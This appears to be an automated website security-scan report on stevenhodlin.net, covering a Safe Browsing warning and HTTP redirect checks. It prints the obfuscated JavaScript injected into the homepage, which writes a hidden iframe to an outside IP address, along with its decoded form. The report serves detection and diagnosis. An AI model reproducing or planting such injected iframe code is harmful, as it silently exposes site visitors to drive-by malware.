Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=stevenhodlin.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://stevenhodlin.net/ | 200 OK Content-Length: 1612 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var tds_url = 'ht' + 'tp:' + '//' + '91.' + '217.' + '91.' + '104' + '/'; var group = '?' + 'i' + 'd' + '=' + '1'; var charset = 'utf-8'; var referer = encodeURIComponent(document.referrer); var url = tds_url + '/' + group + '&se_referer=' + referer + '&charset=' + charset; document.write('<' + 'i' + 'f' + 'r' + 'a' + 'm' + 'e' + ' ' + 'w' + 'i' + 'd' + 't' + 'h' + '=' + '"' + '0' + '"' + ' ' + 'h' + 'e' + 'i' + 'g' + 'h' + 't' + '=' + '"' + '0' + '"' + ' ' + 'f' + 'r' + 'a' + 'm' + 'e' + 'b' + 'o' + 'r' + 'd' + 'e' + 'r' + '=' + '"' + '0' + '"' + ' ' + 's' + 'c' + 'r' + 'o' + 'l' + 'l' + 'i' + 'n' + 'g' + '=' + '"' + 'n' + 'o' + '"' + ' ' + 's' + 'r' + 'c' + '="' + url + '">' + '<' + '/' + 'i' + 'f' + 'r' + 'a' + 'm' + 'e' + '>'); Decoded script: <iframe width="0" height="0" frameborder="0" scrolling="no" src="http://193.203.50.43/?ftp&se_rrr=undefined&charset=utf-8"></iframe> Antivirus reports:
| ||
http://stevenhodlin.net/test404page.js | 404 Not Found Content-Length: 397 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: stevenhodlin.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 12 Jan 2015 14:21:27 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
GET / HTTP/1.1
Host: stevenhodlin.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 12 Jan 2015 14:21:27 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: stevenhodlin.net
Referer: http://www.google.com/search?q=stevenhodlin.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: stevenhodlin.net
Referer: http://www.google.com/search?q=stevenhodlin.net
Result:
The result is similar to the first query. There are no suspicious redirects found.